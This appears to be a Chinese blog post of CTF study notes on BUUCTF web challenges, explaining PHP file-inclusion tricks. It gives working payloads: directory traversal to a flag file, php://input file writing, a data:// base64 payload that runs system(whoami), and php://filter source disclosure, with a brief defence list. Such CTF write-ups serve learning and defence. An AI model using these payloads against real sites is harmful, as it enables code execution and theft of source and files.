buuctf WEB前四题知识点学习

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量787 收藏
点赞数
文章标签: 学习 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876357/article/details/128356971
版权

第三题【极客大挑战 Have Fun】

在Linux系统的include后面第一次发现“/”,那么前面的内容自动失效,从这个之后开始包含。(../不算)

payload

/source.php?file=hint.php?/../../../../ffffllllaaaagggg

第四题【ACTF2020 新生赛 Include】

php://input

用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。

条件:
        php < 5.0,allow_url_include=Off 情况下也可以用
        php > 5.0,只有在allow_url_fopen=On 时才能使用。

例:
         http://localhost/include/file.php?file=php://input     //URL
    <?php fputs(fopen("a.php","w"),"<?php phpinfo();?>")?>  //POST,创建一个文件a.php;并写入phpinfo

data://

将原来的include的文件流重定向到了用户可控制的输入流中

条件:
        allow_url_include=On
        php > 5.2

例:
       http://localhost/file.php?file=data:text/plain;base64,PD9waHAgc3lzdGVtKHdob2FtaSk/Pg==      //base64加密<?php system(whoami);?>;直接执行命令
    http://localhost/image.php?imagedata=data://image/jpeg;base64,..... // 后面加上图片木马;图片命令执行

php://filter

这个语句用来查看源码,直接包含php文件时会被解析,不能看到源码,所以用filter来读取,不过要先base64加密传输过。

例:
        http://localhost/file.php?file=php://filter/read=convert.base64-encode/resource=C:\oneword
                  //可以跟绝对路径也可以跟相对路径
    http://localhost/file.php?file=php://filter/read=convert.base64-encode/resource=[http|https|ftp]://www.bbb.com/2.txt        //远程路径

防御:
        尽量使用安全版本的php
        做好php的安全配置
        对相应目录做相应权限设置

payload

?file=php://filter/read=convert.base64-encode/resource=flag.php

43v3rY0unG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2022-4-28 BUUCTF Crypto区部分目分享
Menou16的博客
05-01 3240
BUUCTF Crypto区部分目分享
BUUCTF逆向前八
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向目,通过这些目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道首先使用exeinfo查看文件信息,确认...
BUUCTF-web类-第四 [SUCTF 2019]EasySQL
weixin_44622228的博客
04-16 482
BUUCTF-web类-第四 [SUCTF 2019]EasySQL进入靶场,看到页面只有一个表单,结合目EasySQL,猜测是注入 输入1,返回数组Array([0]=>1),于是输入1’,发现没有任何回显了,于是尝试各种基本测试手段,order by等等,发现回显Nonono。 之后发现存在堆叠注入,查看数据库 查看表查询Flag表中信息 发现查看不了,这时候想到估计要涉及到骚操作...
BUUCTF——Basic
Zichel77的博客
08-17 5628
所以我们不能将input设为具体的值,而是在序列化执行,令input=&correct。文件包含在 php 中,涉及到的危险函数有四个,分别是 include()、include_once()、require()、require_once()。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程一般被称为文件包含。于是涉及到了md5绕过的问,md5这个地方可以用md5弱碰撞,因为是弱类型比较。以下几个的md5弱类型比较均相等。...
php伪协议实现命令执行
鱼开yk2的博客
10-09 602
单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞 航舰的文件包含函数: include require include_once hightlight_file show_sourcce readfile file_get_contents fopen file 封装协议: file:...
Buuctf-Web-[ACTF2020 新生赛]Include
御七彩虹猫
05-13 491
Buuctf-Web-[ACTF2020 新生赛]Include
BUUCTF部分web
05-06
### BUUCTF部分Web目分析 #### WMCTF2020 Make PHP Great Again **目背景**: 这道目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成...在进行代码审计时,务必关注这些潜在的风险点,以提高应用程序的安全性。
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF web(四)
m0_46616663的博客
11-07 342
[网鼎杯 2020 青龙组]AreUSerialz <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile
BUUCTFweb方向目(四)
wanan的博客
10-06 388
BUUCTFweb方向目(四)
BUUCTF WEB Include(文件包含)
guishengyx的博客
10-18 1993
查看源码,什么都没有 点击tips 目名称也提示了,是文件包含漏洞 百度了解到php://filter伪协议 ?file=php://filter/read=convert.base64-encode/resource=flag.php
学习记录day18——数据结构 算法
weixin_64918301的博客
07-24 922
程序 = 数据结构 + 算法算法是程序设计的灵魂,结构式程序设计的肉体算法:计算机解决问的方法护额步骤。
Python编程学习第一篇——Python零基础快速入门(六)(4)异常处理
urhero的专栏
07-25 432
我们已经了解了Python的基本数据类型、变量和基本的逻辑控制语句,基于这些基础知识可以编写一些小程序了,但是在写程序的时候我们会发现,有时候程序并不是按我们预期的方向执行,有的直接报错,有的没有报错,却并未得到我们预期的结果。在这个例子中,除数为0会引发ZeroDivisionError异常,我们将异常信息赋值给变量e,并输出"除数不能为0"和异常信息。在这个例子中,由于除数不为0,所以没有发生ZeroDivisionError异常,代码会执行else语句块,并输出结果2.0。
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 1002
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
学习测试12-车(略)
qq_44897733的博客
07-25 274
系统讲解,可以在懂车帝网站去了解汽车结构
强化学习学习(三)收敛性证明与DDPG
QinZheng7575的博客
07-25 981
强化学习大多数不是理论收敛的,本文就给出了原因和证明思路。接着我们讨论Double Q-Learning和在连续动作下的强化学习DDPG
【机器学习西瓜书学习笔记——模型评估与选择】
m0_51148715的博客
07-25 560
若一个学习器的 ROC 曲线被另个学习器的曲线完全“包住”,则可断言后者的性能优于前者;我们通常会把学习器的实际预测输出与样本的真实输出之间的差异称为误差。以查准率为纵轴、查全率为横轴作图,就得到了查准率-查全率曲线,简称**“P-R曲线”**,显示该曲线的图称为“P-R图”.③查准率越高,说明模型预测结果中真正例的比例越高,模型对于正样本的识别能力越强。③查全率越高,说明模型能够成功预测出的正样本比例越高,模型的识别能力越全面。目的:对于一个模型,根据p不同,找到使得代价总期望最小的模型的阈值。
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTFbuuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTFWeb方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值